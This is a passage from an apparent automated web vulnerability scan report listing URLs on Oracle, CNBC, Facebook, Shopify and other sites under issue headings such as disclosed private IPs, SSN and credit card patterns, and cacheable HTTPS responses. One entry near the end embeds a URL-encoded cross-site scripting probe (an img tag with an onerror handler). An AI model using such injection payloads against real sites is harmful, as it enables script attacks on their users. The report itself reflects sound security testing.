22.35. http://www.covergirl.com/CSS/jqModal.css
22.36. http://www.covergirl.com/Script/jqModal_mod.js
22.37. http://www.covergirl.com/Script/jquery.cookie.js
22.38. http://www.covergirl.com/Script/jquery.hoverIntent.min.js
22.39. http://www.csc.com/contact_us
22.40. http://www.csc.com/javascripts/public/s_code.js
22.41. http://www.deloitte.com/deloitte-ecm-cm-dpm-web/common/hover/js/jquery.hoverIntent.js
22.42. http://www.dove.us/Resources/JS/colorbox/jquery.colorbox.js
22.43. http://www.fekkai.com/js/mootools-1.2.4.2-more.js
22.44. http://www.fekkai.com/js/multibox/multiBox.js
22.45. http://www.fekkai.com/js/multibox/overlay.js
22.46. http://www.harbottle.com/hnl/pages/article_view_hnl/1689.php
22.47. http://www.harbottle.com/hnl/pages/pubs/479
22.48. http://www.netsuite.com/portal/javascript/DD_roundies.js
22.49. http://www.netsuite.com/portal/javascript/jquery.colorbox-min.js
22.50. http://www.netsuite.com/portal/javascript/jquery.colorbox.js
22.51. http://www.oracle.com/as/corporate/contact/bangladesh-316183-en-as.html
22.52. http://www.oracle.com/as/corporate/contact/bhutan-316187-en-as.html
22.53. http://www.oracle.com/as/corporate/contact/brunei-316198-en-as.html
22.54. http://www.oracle.com/as/corporate/contact/cambodia-316193-en-as.html
22.55. http://www.oracle.com/as/corporate/contact/laos-316260-en-as.html
22.56. http://www.oracle.com/as/corporate/contact/maldives-316209-en-as.html
22.57. http://www.oracle.com/as/corporate/contact/nepal-316215-en-as.html
22.58. http://www.oracle.com/as/corporate/contact/pakistan-316185-en-as.html
22.59. http://www.oracle.com/ocom/groups/systemobject/@mktg_admin/documents/systemobject/s_code.js
22.60. http://www.oracle.com/openworld/contact/index.html
22.61. http://www.oracle.com/openworld/register/packages/index.html
22.62. http://www.oracle.com/partners/en/opn-program/membership-resources/business-center/index.html
22.63. http://www.oracle.com/technetwork/oramag/magazine/home/index.html
22.64. http://www.oracle.com/us/assets/masterhp.js
22.65. http://www.oracle.com/us/ciocentral/index.html
22.66. http://www.oracle.com/us/corporate/Acquisitions/index.html
22.67. http://www.oracle.com/us/corporate/analystrelations/index.html
22.68. http://www.oracle.com/us/corporate/citizenship/index.html
22.69. http://www.oracle.com/us/corporate/customers/oracle-users-groups-192206.html
22.70. http://www.oracle.com/us/corporate/insight/index.html
22.71. http://www.oracle.com/us/corporate/press/BoardofDirectors/index.html
22.72. http://www.oracle.com/us/corporate/press/Executives/index.html
22.73. http://www.oracle.com/us/corporate/press/index.html
22.74. http://www.oracle.com/us/corporate/profit/index.html
22.75. http://www.oracle.com/us/corporate/publishing/index.html
22.76. http://www.oracle.com/us/education/oukc/email-079121.html
22.77. http://www.oracle.com/us/industries/financial-services/index.html
22.78. http://www.oracle.com/us/industries/retail/index.html
22.79. http://www.oracle.com/us/partnerships/solutions/index.html
22.80. http://www.oracle.com/us/products/applications/primavera/index.html
22.81. http://www.oracle.com/us/sun/index.html
22.82. http://www.oracle.com/us/support/advanced-customer-services/index.html
22.83. http://www.oracle.com/us/support/contact-068555.html
22.84. http://www.oracleimg.com/ocom/groups/systemobject/@mktg_admin/documents/systemobject/s_code.js
22.85. http://www.rayalab.com/
22.86. http://www.rayalab.com/free_sample.html
22.87. http://www.resourcepoint.net/ATG-Services.htm
22.88. http://www.resourcepoint.net/TibcoTech.htm
22.89. http://www.resourcepoint.net/contactus.htm
22.90. http://www.resourcepoint.net/form.htm
22.91. http://www.revsolutionsinc.com/careers.html
22.92. http://www.revsolutionsinc.com/careers_req_7.html
22.93. http://www.revsolutionsinc.com/contact_us.html
22.94. http://www.sophelle.com/
22.95. http://www.sophelle.com/Contact-Us/
22.96. http://www.sophelle.com/Contact-Us/thank-you.html
22.97. http://www.sophelle.com/Products/
22.98. http://www.sophelle.com/Products/CQ/free-trial.html
22.99. http://www.sophelle.com/Products/CQ/index.html
22.100. http://www.sophelle.com/Products/accelerator2.html
22.101. http://www.sophelle.com/Success-Stories/
22.102. http://www.sophelle.com/Success-Stories/Automated-Website-Testing.html
22.103. http://www.sophelle.com/products/cq/
22.104. http://www.sophelle.com/products/cq/expert-analysis.html
22.105. http://www.sophelle.com/products/cq/frequently-asked-questions.html
22.106. http://www.sophelle.com/products/cq/functional-testing.html
22.107. http://www.sophelle.com/products/cq/performance-testing.html
22.108. http://www.sophelle.com/products/cq/pricing-options.html
22.109. http://www.sophelle.com/products/cq/thank-you-trial.html
22.110. http://www.sophelle.com/products/cq/user-interface-testing.html
22.111. http://www.tenzing.com/atg-ecommerce-hosting.asp
22.112. http://www.tenzing.com/cloud/cloud-pricing.asp
22.113. http://www.tenzing.com/cloud/sign-up-now.asp
22.114. http://www.tenzing.com/css/basic_stylesheet_v1.1.css
22.115. http://www.tenzing.com/css/navigation_stylesheet_v1.1.css
22.116. http://www.tenzing.com/hosting-solutions.asp
22.117. http://www.tenzing.com/js/jquery/jquery.accordion.js
22.118. http://www.tenzing.com/sitemap.asp
22.119. http://www.tenzing.com/validation.js
23. Private IP addresses disclosed
23.1. http://blog.ulf-wendel.de/
23.2. http://code.openark.org/blog/
23.3. http://developers.facebook.com/plugins/
23.4. http://digg.com/submit
23.5. http://search.oracle.com/search/js/resources/TranslationElements_en11_1_1_0_0.js
23.6. http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php/en_US
23.7. http://www.facebook.com/extern/login_status.php
23.8. http://www.facebook.com/extern/login_status.php
23.9. http://www.facebook.com/extern/login_status.php
23.10. http://www.facebook.com/plugins/activity.php
23.11. http://www.facebook.com/plugins/activity.php
23.12. http://www.facebook.com/plugins/like.php
23.13. http://www.facebook.com/plugins/like.php
23.14. http://www.facebook.com/plugins/like.php
23.15. http://www.facebook.com/plugins/like.php
23.16. http://www.facebook.com/plugins/like.php
23.17. http://www.facebook.com/plugins/like.php
23.18. http://www.facebook.com/plugins/like.php
23.19. http://www.facebook.com/plugins/like.php
23.20. http://www.facebook.com/plugins/like.php
23.21. http://www.facebook.com/plugins/like.php
23.22. http://www.fekkai.com/
23.23. http://www.google.com/sdch/StnTz5pY.dct
23.24. http://www.oracle.com/technetwork/community/developer-vm/index.html
23.25. http://www.oracle.com/technetwork/database/enterprise-edition/downloads/index.html
23.26. http://www.oracle.com/technetwork/database/windows/downloads/index-101290.html
23.27. http://www.oracle.com/technetwork/developer-tools/apex/downloads/index.html
23.28. http://www.oracle.com/technetwork/developer-tools/jdev/downloads/index.html
23.29. http://www.oracle.com/technetwork/middleware/soasuite/downloads/index.html
23.30. http://www.oracle.com/technetwork/oem/grid-control/downloads/index.html
24. Social security numbers disclosed
24.1. http://assets.olark.com/a/assets/v0/site/7855-664-10-3086.js
24.2. http://www.oracle.com/partners/en/opn-program/membership-resources/business-center/index.html
24.3. http://www.shopify.com/admin/auth/login
24.4. http://www.shopify.com/examples
24.5. http://www.shopify.com/login
24.6. http://www.shopify.com/tour
25. Credit card numbers disclosed
25.1. http://api.cnbc.com/api/movers/movers.asp
25.2. http://assets1.csc.com/es/downloads/7380_2.pdf
25.3. http://assets1.csc.com/lef/downloads/LEFBriefing_TestingApplicationsCloud_021011.pdf
25.4. http://assets1.csc.com/lef/downloads/LEF_Briefing_TestingCoE_052809.pdf
25.5. http://education.oracle.com/education/jscripts/otn_nav1.js
25.6. https://education.oracle.com/education/jscripts/otn_nav1.js
25.7. http://www.oracle.com/ao/index.html
25.8. http://www.oracle.com/as/corporate/contact/bangladesh-316183-en-as.html
25.9. http://www.oracle.com/as/corporate/contact/bhutan-316187-en-as.html
25.10. http://www.oracle.com/as/corporate/contact/brunei-316198-en-as.html
25.11. http://www.oracle.com/as/corporate/contact/cambodia-316193-en-as.html
25.12. http://www.oracle.com/as/corporate/contact/laos-316260-en-as.html
25.13. http://www.oracle.com/as/corporate/contact/maldives-316209-en-as.html
25.14. http://www.oracle.com/as/corporate/contact/nepal-316215-en-as.html
25.15. http://www.oracle.com/as/corporate/contact/pakistan-316185-en-as.html
25.16. http://www.oracle.com/index.html
25.17. http://www.oracle.com/technetwork/apps-tech/index-095827.html
25.18. http://www.oracle.com/technetwork/apps-tech/index-097651.html
25.19. http://www.oracle.com/technetwork/apps-tech/index.html
25.20. http://www.oracle.com/technetwork/architect/index.html
25.21. http://www.oracle.com/technetwork/articles/index.html
25.22. http://www.oracle.com/technetwork/community/developer-vm/index.html
25.23. http://www.oracle.com/technetwork/community/join/overview/index.html
25.24. http://www.oracle.com/technetwork/community/oracle-ace/index.html
25.25. http://www.oracle.com/technetwork/database/berkeleydb/downloads/index.html
25.26. http://www.oracle.com/technetwork/database/enterprise-edition/documentation/index.html
25.27. http://www.oracle.com/technetwork/database/enterprise-edition/downloads/index.html
25.28. http://www.oracle.com/technetwork/database/enterprise-edition/overview/index.html
25.29. http://www.oracle.com/technetwork/database/express-edition/downloads/index.html
25.30. http://www.oracle.com/technetwork/database/features/instant-client/index-097480.html
25.31. http://www.oracle.com/technetwork/database/windows/downloads/index-101290.html
25.32. http://www.oracle.com/technetwork/dbadev/index.html
25.33. http://www.oracle.com/technetwork/developer-tools/apex/downloads/index.html
25.34. http://www.oracle.com/technetwork/developer-tools/eclipse/downloads/index.html
25.35. http://www.oracle.com/technetwork/developer-tools/index.html
25.36. http://www.oracle.com/technetwork/developer-tools/jdev/downloads/index.html
25.37. http://www.oracle.com/technetwork/developer-tools/sql-developer/downloads/index.html
25.38. http://www.oracle.com/technetwork/index.html
25.39. http://www.oracle.com/technetwork/indexes/documentation/index.html
25.40. http://www.oracle.com/technetwork/indexes/downloads/index.html
25.41. http://www.oracle.com/technetwork/indexes/products/index.html
25.42. http://www.oracle.com/technetwork/java/index.html
25.43. http://www.oracle.com/technetwork/middleware/fusion-middleware/documentation/index.html
25.44. http://www.oracle.com/technetwork/middleware/fusion-middleware/downloads/index.html
25.45. http://www.oracle.com/technetwork/middleware/fusion-middleware/overview/index.html
25.46. http://www.oracle.com/technetwork/middleware/jrockit/downloads/index.html
25.47. http://www.oracle.com/technetwork/middleware/soasuite/downloads/index.html
25.48. http://www.oracle.com/technetwork/oem/downloads/index-084446.html
25.49. http://www.oracle.com/technetwork/oem/grid-control/documentation/index.html
25.50. http://www.oracle.com/technetwork/oem/grid-control/downloads/index.html
25.51. http://www.oracle.com/technetwork/oem/grid-control/overview/index.html
25.52. http://www.oracle.com/technetwork/oramag/magazine/home/index.html
25.53. http://www.oracle.com/technetwork/server-storage/solaris/downloads/index.html
25.54. http://www.oracle.com/technetwork/systems/index.html
25.55. http://www.oracle.com/technetwork/topics/cloud/index.html
25.56. http://www.oracle.com/technetwork/topics/index.html
25.57. http://www.oracle.com/technetwork/topics/newtojava/index.html
25.58. http://www.oracle.com/technetwork/topics/newtojava/overview/index.html
25.59. http://www.oracle.com/technetwork/topics/security/index.html
25.60. http://www.oracle.com/technetwork/topics/soa/index.html
25.61. http://www.oracle.com/technetwork/topics/virtualization/index.html
25.62. http://www.oracle.com/us/community/index.html
25.63. http://www.oracle.com/us/corporate/Acquisitions/index.html
25.64. http://www.oracle.com/us/corporate/analystrelations/index.html
25.65. http://www.oracle.com/us/corporate/blogs/index.html
25.66. http://www.oracle.com/us/corporate/careers/index.html
25.67. http://www.oracle.com/us/corporate/citizenship/community/038108.htm
25.68. http://www.oracle.com/us/corporate/citizenship/index.html
25.69. http://www.oracle.com/us/corporate/customers/index.html
25.70. http://www.oracle.com/us/corporate/customers/oracle-users-groups-192206.html
25.71. http://www.oracle.com/us/corporate/features/engineered-173370.html
25.72. http://www.oracle.com/us/corporate/history/index.html
25.73. http://www.oracle.com/us/corporate/index.html
25.74. http://www.oracle.com/us/corporate/innovation/index.html
25.75. http://www.oracle.com/us/corporate/insight/index.html
25.76. http://www.oracle.com/us/corporate/investor-relations/corporate-governance-176724.html
25.77. http://www.oracle.com/us/corporate/investor-relations/index.html
25.78. http://www.oracle.com/us/corporate/oracle-racing-070515.html
25.79. http://www.oracle.com/us/corporate/press/BoardofDirectors/index.html
25.80. http://www.oracle.com/us/corporate/press/Executives/index.html
25.81. http://www.oracle.com/us/corporate/press/index.html
25.82. http://www.oracle.com/us/corporate/pricing/index.html
25.83. http://www.oracle.com/us/corporate/pricing/price-lists/index.html
25.84. http://www.oracle.com/us/corporate/profit/index.html
25.85. http://www.oracle.com/us/corporate/publishing/index.html
25.86. http://www.oracle.com/us/index.html
25.87. http://www.oracle.com/us/industries/communications/index.html
25.88. http://www.oracle.com/us/industries/education-and-research/018753.htm
25.89. http://www.oracle.com/us/industries/engineering-and-construction/index.html
25.90. http://www.oracle.com/us/industries/financial-services/index.html
25.91. http://www.oracle.com/us/industries/index.html
25.92. http://www.oracle.com/us/industries/retail/index.html
25.93. http://www.oracle.com/us/partnerships/solutions/index.html
25.94. http://www.oracle.com/us/partnerships/specialized-showcase-224514.html
25.95. http://www.oracle.com/us/products/applications/fusion/index.html
25.96. http://www.oracle.com/us/products/applications/index.html
25.97. http://www.oracle.com/us/products/applications/jd-edwards-enterpriseone/index.html
25.98. http://www.oracle.com/us/products/applications/peoplesoft-enterprise/index.html
25.99. http://www.oracle.com/us/products/applications/primavera/index.html
25.100. http://www.oracle.com/us/products/consulting/index.html
25.101. http://www.oracle.com/us/products/database/index.html
25.102. http://www.oracle.com/us/products/enterprise-manager/index.html
25.103. http://www.oracle.com/us/products/financing/index.html
25.104. http://www.oracle.com/us/products/index.html
25.105. http://www.oracle.com/us/products/middleware/exalogic/index.html
25.106. http://www.oracle.com/us/products/middleware/index.html
25.107. http://www.oracle.com/us/products/ondemand/index.html
25.108. http://www.oracle.com/us/products/productslist/index.html
25.109. http://www.oracle.com/us/products/servers-storage/index.html
25.110. http://www.oracle.com/us/products/servers-storage/solaris/index.html
25.111. http://www.oracle.com/us/products/tools/index.html
25.112. http://www.oracle.com/us/social-media/facebook/index.html
25.113. http://www.oracle.com/us/social-media/linkedin/index.html
25.114. http://www.oracle.com/us/social-media/twitter/index.html
25.115. http://www.oracle.com/us/solutions/corporate-governance/index.html
25.116. http://www.oracle.com/us/solutions/datawarehousing/index.html
25.117. http://www.oracle.com/us/solutions/ent-performance-bi/index.html
25.118. http://www.oracle.com/us/solutions/midsize/index.html
25.119. http://www.oracle.com/us/solutions/performance-scalability/index.html
25.120. http://www.oracle.com/us/solutions/solutions-165852.html
25.121. http://www.oracle.com/us/sun/index.html
25.122. http://www.oracle.com/us/support/advanced-customer-services/index.html
25.123. http://www.oracle.com/us/support/contact-068555.html
25.124. http://www.oracle.com/us/support/development-tools-080025.html
25.125. http://www.oracle.com/us/support/index.html
25.126. http://www.oracle.com/us/support/lifetime-support/index.html
25.127. http://www.oracle.com/us/support/oracle-support-services-359636.html
25.128. http://www.oracle.com/us/support/policies/index.html
25.129. http://www.oracle.com/us/support/premier/index.html
25.130. http://www.oracle.com/us/support/support-integration/index.html
25.131. http://www.oracle.com/us/syndication/subscribe/index.html
25.132. http://www.oracle.com/us/technologies/cloud/index.html
25.133. http://www.oracle.com/us/technologies/java/index.html
25.134. http://www.oracle.com/us/technologies/virtualization/index.html
25.135. http://www.oracleimg.com/us/assets/metrics/crossdomain.xml
26. Robots.txt file
26.1. http://1215.ic-live.com/goat.php
26.2. http://4qinvite.4q.iperceptions.com/1.aspx
26.3. http://904-kuw-942.mktoresp.com/webevents/visitWebPage
26.4. http://a.tribalfusion.com/displayAd.js
26.5. http://ad.doubleclick.net/adj/nbcu.cnbc/search
26.6. http://ad.yieldmanager.com/pixel
26.7. http://adclick.g.doubleclick.net/aclk
26.8. http://ads.pointroll.com/PortalServe/
26.9. http://adx.g.doubleclick.net/pagead/adview
26.10. http://ajax.googleapis.com/ajax/libs/jquery/1/jquery.min.js
26.11. http://altfarm.mediaplex.com/ad/bk/17353-119518-3840-0
26.12. http://api.bizographics.com/v1/profile.redirect
26.13. http://api.twitter.com/1/statuses/user_timeline.json
26.14. http://assets1.csc.com/home/media/billboard195.swf
26.15. http://at.amgdgt.com/ads/
26.16. http://b.scorecardresearch.com/b
26.17. http://blog.harbottle.com/dm
26.18. http://blogs.oracle.com/otn/
26.19. https://bugzilla.mozilla.org/show_bug.cgi
26.20. http://c.betrad.com/surly.js
26.21. http://c.brightcove.com/services/viewer/federated_f9
26.22. http://c.statcounter.com/t.php
26.23. http://cdn.gigya.com/JS/socialize.js
26.24. http://cdn.krxd.net/config/
26.25. http://cdn5.tribalfusion.com/media/1956006/frame.html
26.26. http://clickserve.dartsearch.net/link/click
26.27. http://clk.fetchback.com/serve/fb/click
26.28. http://cm.g.doubleclick.net/pixel
26.29. https://cms.paypal.com/us/cgi-bin/
26.30. http://cnbc.com/crossdomain.xml
26.31. http://content.links.channelintelligence.com/images/blank.gif
26.32. http://convctr.overture.com/images/cc/cc.gif
26.33. http://d.ads.readwriteweb.com/spcjs.php
26.34. http://d1.openx.org/ck.php
26.35. http://d7.zedo.com/jsc/d3/fl.js
26.36. http://deloitte.12hna.com/preferences/index.php
26.37. http://dev.mysql.com/common/js/s_code_remote.js
26.38. http://digg.com/submit
26.39. https://docs.google.com/
26.40. http://download.oracle.com/docs/html/E13982_01/wsassemble.htm
26.41. http://edge.sapient.com/assets/images/favicon.ico
26.42. http://education.oracle.com/pls/web_prod-plq-dad/db_pages.getCourseDesc
26.43. https://education.oracle.com/favicon.ico
26.44. http://event.on24.com/r.htm
26.45. https://event.on24.com/eventRegistration/prereg/register.jsp
26.46. http://events.oracle.com/search/search
26.47. http://executivevision.cnbc.com/
26.48. http://fls.doubleclick.net/activityi
26.49. http://fonts.googleapis.com/css
26.50. https://forms.netsuite.com/app/site/crm/externalleadpage.nl
26.51. https://forums.oracle.com/forums/style/style.jsp
26.52. http://img-cdn.mediaplex.com/0/17353/universal.html
26.53. http://imp.fetchback.com/serve/fb/adtag.js
26.54. http://intelligence.marykay.com/b/ss/marykaycom,marykayusglobal/1/H.23.3/s11730084258597
26.55. http://keywords.fmpub.net/
26.56. http://l.addthiscdn.com/live/t00/250lo.gif
26.57. http://l.apture.com/v3/
26.58. http://legolas.nexac.com/lgalt
26.59. http://m.cnbc.com/
26.60. https://myprofile.oracle.com/EndUser/faces/profile/createUser.jspx
26.61. http://netsuite-www.baynote.net/baynote/customerstatus2
26.62. http://netsuite.tt.omtrdc.net/m2/netsuite/mbox/standard
26.63. http://network.realmedia.com/RealMedia/ads/adstream_nx.ads/TRACK_Volusion2011test/Retargeting_Homepage_Nonsecure@Bottom3
26.64. http://now.eloqua.com/visitor/v200/svrGP.aspx
26.65. http://oimg.m.cnbc.com/b/ss/nbcucnbcwapbu,nbcuwapsitebu/5/H.8--WAP/543473694
26.66. http://oimg.nbcuni.com/b/ss/nbcuglobal,%20nbcucnbcd,%20nbcucnbcbu/1/H.2-pdv-2/s06181409736163
26.67. http://omni.csc.com/b/ss/csccom/1/H.15.1/s04067904318217
26.68. http://oracle.112.2o7.net/b/ss/oraclecom,oracleglobal/1/H.23.3/s05522931320592
26.69. http://oracleglobal.112.2o7.net/b/ss/oracleglobal,oraclecom,oracleopenworld/1/H.19.4/s06861332259140
26.70. http://oracleuniversity.112.2o7.net/b/ss/oracleuniversity,oracleglobal/1/G.7-Pd-R/s17226938849569
26.71. https://oracleus.wingateweb.com/portal/newreg.ww
26.72. http://pagead2.googlesyndication.com/pagead/imgad
26.73. http://pg.links.channelintelligence.com/pages/CBLJS.asp
26.74. http://pg.links.origin.channelintelligence.com/pages/wl.asp
26.75. http://pi.pardot.com/analytics
26.76. http://pixel.everesttech.net/1688/i
26.77. http://pixel.fetchback.com/serve/fb/pdc
26.78. http://pixel.mathtag.com/event/img
26.79. http://pixel.quantserve.com/pixel
26.80. http://r.casalemedia.com/j.gif
26.81. http://rd.rlcdn.com/rd
26.82. http://reviews.gillettevenus.com/4746/00047400302457/reviews.htm
26.83. http://rt.legolas-media.com/lgrt
26.84. http://rww.readwriteweb.netdna-cdn.com/mt-static/themes/df/rww_global.css
26.85. http://s0.2mdn.net/3232241/Russell_Headline_728x90b_REV.swf
26.86. http://s7.addthis.com/js/addthis_widget.php
26.87. http://search.oracle.com/search/search
26.88. http://search.twitter.com/search.json
26.89. http://services.krxd.net/pixel.gif
26.90. https://shop.oracle.com/store/Database
26.91. http://speed.pointroll.com/PointRoll/Media/Banners/Lego/893716/superbrick_300x250_flash_r01.swf
26.92. http://stats.deloitte.com/b/ss/deloittecomnewplatformprod/1/H.22.1/s09288867821451
26.93. http://tag.admeld.com/ad/iframe/677/cnbc/300x250/atf
26.94. http://tf.nexac.com/media/1809966/na.html
26.95. http://thinkwrap.com/ourfocus/atg-ecommerce-solutions-partner/
26.96. http://twitter.com/statuses/user_timeline/CenturyLinkBiz.json
26.97. http://wingateweb.112.2o7.net/b/ss/winweboracle/1/H.20.3/s05398456470575
26.98. http://wt.infosys.com/dcsompe1g7xywz12f97ensgi0_4h9t/dcs.gif
26.99. http://www.actonsoftware.com/acton/bn/1227/visitor.gif
26.100. http://www.apture.com/js/apture.js
26.101. http://www.atg.com/
26.102. https://www.atg.com/service/main.jsp
26.103. http://www.beautyproductsdirect.com/
26.104. http://www.bigcommerce.com/lp/e1-lp-ecommerce.php
26.105. https://www.bigcommerce.com/pci-compliant-shopping-cart-software.php
26.106. http://www.bizographics.com/collect/
26.107. http://www.cnbc.com/
26.108. http://www.csc.com/
26.109. http://www.cvs.com/CVSApp/promoContent/promoLandingTemplate.jsp
26.110. https://www.cvs.com/CVSApp/checkout/rx/rx_new_container.jsp
26.111. http://www.deloitte.com/
26.112. http://www.facebook.com/extern/login_status.php
26.113. http://www.fetchback.com/
26.114. http://www.google-analytics.com/__utm.gif
26.115. http://www.googleadservices.com/pagead/aclk
26.116. http://www.harbottle.com/hnl/pages/hnl.php
26.117. http://www.imiclk.com/cgi/r.cgi
26.118. http://www.linkedin.com/countserv/count/share
26.119. http://www.marykay.com/
26.120. http://www.netsuite.com/portal/seo-landing-page/ecommerce/ecommerce-2.html
26.121. http://www.oracle.com/index.html
26.122. http://www.readwriteweb.com/enterprise/2010/11/oracle.php
26.123. http://www.sapient.com/en-us/about-sapient/alliances/atg.html
26.124. http://www.shopify.com/
26.125. http://www.sophelle.com/
26.126. http://www.tenzing.com/atg-ecommerce-hosting.asp
26.127. http://www.volusion.com/
26.128. http://www.youtube.com/v/JWMKXb1Guq4
26.129. http://www.znode.com/znode-multifront/default.aspx
26.130. http://www2.znode.com/analytics
27. Cacheable HTTPS response
27.1. https://bugzilla.mozilla.org/show_bug.cgi
27.2. https://deloitte.zettaneer.com/Subscriptions/
27.3. https://dne.oracle.com/pls/uns/OPT_OUT.th
27.4. https://event.on24.com/eventRegistration/prereg/register.jsp
27.5. https://forms.netsuite.com/core/media/media.nl
27.6. https://forums.oracle.com/forums/category.jspa
27.7. https://forums.oracle.com/forums/guestsettings!default.jspa
27.8. https://forums.oracle.com/forums/main.jspa
27.9. https://forums.oracle.com/forums/themes/english/resources/feed-icon-14x14.jpg
27.10. https://forums.oracle.com/forums/themes/english/resources/info_company.gif
27.11. https://forums.oracle.com/forums/themes/english/resources/oralogo_small.gif
27.12. https://forums.oracle.com/forums/themes/english/resources/otn_new.css
27.13. https://forums.oracle.com/forums/themes/english/resources/s_code.js
27.14. https://forums.oracle.com/forums/themes/english/resources/s_code_forums.js
27.15. https://forums.oracle.com/forums/themes/english/resources/spacer.gif
27.16. https://forums.oracle.com/forums/themes/english/resources/style.css
27.17. https://login.cnbc.com/
27.18. https://login.cnbc.com/cas/checkCasTicket
27.19. https://login.oracle.com/oam/server/sso/auth_cred_submit
27.20. https://login.oracle.com/pls/orasso/orasso.wwsso_app_admin.ls_login
27.21. https://myprofile.oracle.com/EndUser/faces/profile/createUser.jspx
27.22. https://myprofile.oracle.com/EndUser/faces/profile/findUsername.jspx
27.23. https://myprofile.oracle.com/EndUser/images/fading-background.png
27.24. https://myprofile.oracle.com/EndUser/images/logo-oracle-red.png
27.25. https://myprofile.oracle.com/EndUser/jscripts/s_code.js
27.26. https://myprofile.oracle.com/EndUser/jscripts/s_code_popup.js
27.27. https://myprofile.oracle.com/EndUser/jscripts/s_code_profile.js
27.28. https://myprofile.oracle.com/EndUser/jscripts/s_validation.js
27.29. https://oracleus.wingateweb.com/portal/dwr/interface/PortalAjax.js
27.30. https://register.cnbc.com/
27.31. https://register.cnbc.com/email/EmailSupport.jsp
27.32. https://shop.oracle.com/pls/ostore/f
27.33. https://support.oracle.com/
27.34. https://support.oracle.com/CSP/ui/blank.html
27.35. https://support.oracle.com/CSP/ui/flash.html
27.36. https://support.oracle.com/CSP/ui/xml/sunConnect.html
27.37. https://www.atg.com/dojo-1/dijit/nls/loading.js
27.38. https://www.atg.com/favicon.ico
27.39. https://www.cvs.com/CVSApp/html/blank.html
27.40. https://www.cvs.com/CVSApp/user/forgot_password.jsp
27.41. https://www.cvs.com/CVSApp/user/login.jsp
28. Multiple content types specified
29. HTML does not specify charset
29.1. http://a.tribalfusion.com/i.cid
29.2. http://a.tribalfusion.com/j.ad
29.3. http://a.tribalfusion.com/p.media/aamOnI1cUV0GrpmEn23rFUVFFCVPY0REfYQGBsStZbwYHfrVmbO3GvVXbnAVmuu2AU8P6MD4HFr0HQAntIx3P3R5cvbUGJlVVMjPPnyWd33UrFS2r2rUanvVEQ7STYJScfJPFunRtjdVGMP5buxmtetYayx2t3EPGfA2mJyfvX8cG/2020316/frame.html
29.4. http://a.tribalfusion.com/z/i.cid
29.5. http://ad.doubleclick.net/adi/N3643.196990.READWRITEWEB.COM/B5659394
29.6. http://ad.doubleclick.net/adi/N763.SpecificMedia.com/B5645537.38
29.7. http://ad.doubleclick.net/adi/N763.SpecificMedia/B5646003.2
29.8. http://ad.doubleclick.net/clk
29.9. http://ads.pointroll.com/PortalServe/
29.10. http://api-cdn.cnbc.com/api/chart/chart.asp
29.11. http://api.cnbc.com/api/chart/chart.asp
29.12. http://api.cnbc.com/api/movers/movers.asp
29.13. http://apps.cnbc.com/
29.14. http://apps.cnbc.com/Includes/CheckPng/Script.asp
29.15. http://apps.cnbc.com/company/quote/incchart.asp
29.16. http://blog.harbottle.com/dm/wp-content/plugins/wp-hashcash/wp-hashcash-getkey.php
29.17. http://blog.harbottle.com/dm/wp-content/plugins/wp-hashcash/wp-hashcash-js.php
29.18. http://blog.harbottle.com/dm/xmlrpc.php
29.19. http://blogs.oracle.com/main/resource/resources/ora_code_blogs.js
29.20. http://blogs.oracle.com/otn/resource/1OTN-2col/OTNHead-Short.png
29.21. http://blogs.oracle.com/otn/resource/SunOracle.png
29.22. http://blogs.oracle.com/otn/resource/java-logo.png
29.23. http://blogs.oracle.com/theme/scripts/clientSideInclude.js
29.24. http://blogs.oracle.com/theme/scripts/roller.js
29.25. http://c.brightcove.com/services/messagebroker/amf
29.26. http://cdn.krxd.net/kruxcontent/krux_iframe.html
29.27. http://cdn5.tribalfusion.com/media/1956006/frame.html
29.28. http://cdn5.tribalfusion.com/media/2516896//frm.html
29.29. http://ds.addthis.com/red/psi/sites/www.dove.us/p.json
29.30. http://fls.doubleclick.net/activityi
29.31. http://install.volusion.com/installer/demos/Empty.htm
29.32. http://js.adsonar.com/js/pass.html
29.33. https://login.cnbc.com/
29.34. http://m.cnbc.com/mytest/ipecho.php
29.35. https://myprofile.oracle.com/EndUser/images/fading-background.png
29.36. https://myprofile.oracle.com/EndUser/images/logo-oracle-red.png
29.37. https://myprofile.oracle.com/EndUser/jscripts/s_code.js
29.38. https://myprofile.oracle.com/EndUser/jscripts/s_code_popup.js
29.39. https://myprofile.oracle.com/EndUser/jscripts/s_code_profile.js
29.40. https://myprofile.oracle.com/EndUser/jscripts/s_validation.js
29.41. http://now.eloqua.com/visitor/v200/svrGP.aspx
29.42. http://optimized-by.rubiconproject.com/a/dk.html
29.43. http://pro.cnbc.com/
29.44. http://pro.cnbc.com/index.asp
29.45. https://register.cnbc.com/
29.46. https://register.cnbc.com/RandomImage.jsp
29.47. http://snas.nbcuni.com/snas/api/getRemoteDomainCookies
29.48. https://support.oracle.com/
29.49. https://support.oracle.com/CSP/ui/xml/sunConnect.html
29.50. http://tag.admeld.com/ad/iframe/677/cnbc/300x250/atf
29.51. http://tag.admeld.com/ad/iframe/677/cnbc/728x90/atf
29.52. http://tf.nexac.com/media/1809966/na.html
29.53. http://ticker.cnbc.com/
29.54. http://tps31.doubleverify.com/visit.js
29.55. http://uac.advertising.com/wrapper/aceUACping.htm
29.56. http://videometa.cnbc.com/getadmincontent.do
29.57. http://view.atdmt.com/BVK/iview/349019750/direct/01/8665855478
29.58. http://view.atdmt.com/FXM/iview/308880957/direct/01/1049994
29.59. http://view.atdmt.com/FXM/iview/308880957/direct/01/466318
29.60. http://view.atdmt.com/FXM/iview/308880957/direct/01/5096911
29.61. http://view.atdmt.com/FXM/iview/308880957/direct/01/5912867
29.62. http://view.atdmt.com/FXM/iview/308880957/direct/01/6197540
29.63. http://view.atdmt.com/FXM/iview/308880957/direct/01/7067761
29.64. http://view.atdmt.com/FXM/iview/308880957/direct/01/7533182
29.65. http://view.atdmt.com/FXM/iview/308880957/direct/01/7760164
29.66. http://view.atdmt.com/iaction/adoapn_AppNexusDemoActionTag_1
29.67. http://wd.sharethis.com/api/getCount2.php
29.68. http://www.bigcommerce.com/freetrial.php
29.69. http://www.bigcommerce.com/lp/e1-lp-ecommerce.php
29.70. http://www.gillettevenus.com/en_US/goddess_central/styles/fancybox/jquery.fancybox-1.3.4.js
29.71. http://www.gillettevenus.com/en_US/images/go_roll.png
29.72. http://www.gillettevenus.com/global/blank.html
29.73. http://www.harbottle.com/hnl/pages/hnl_search2.php/353c3%3E%3Cimg%20src%3da%20onerror%3dprompt(document.location)%3E9d536909165a5febf
29.74. http://www.harbottle.com/hnl/pages/hnl_search2.php/a
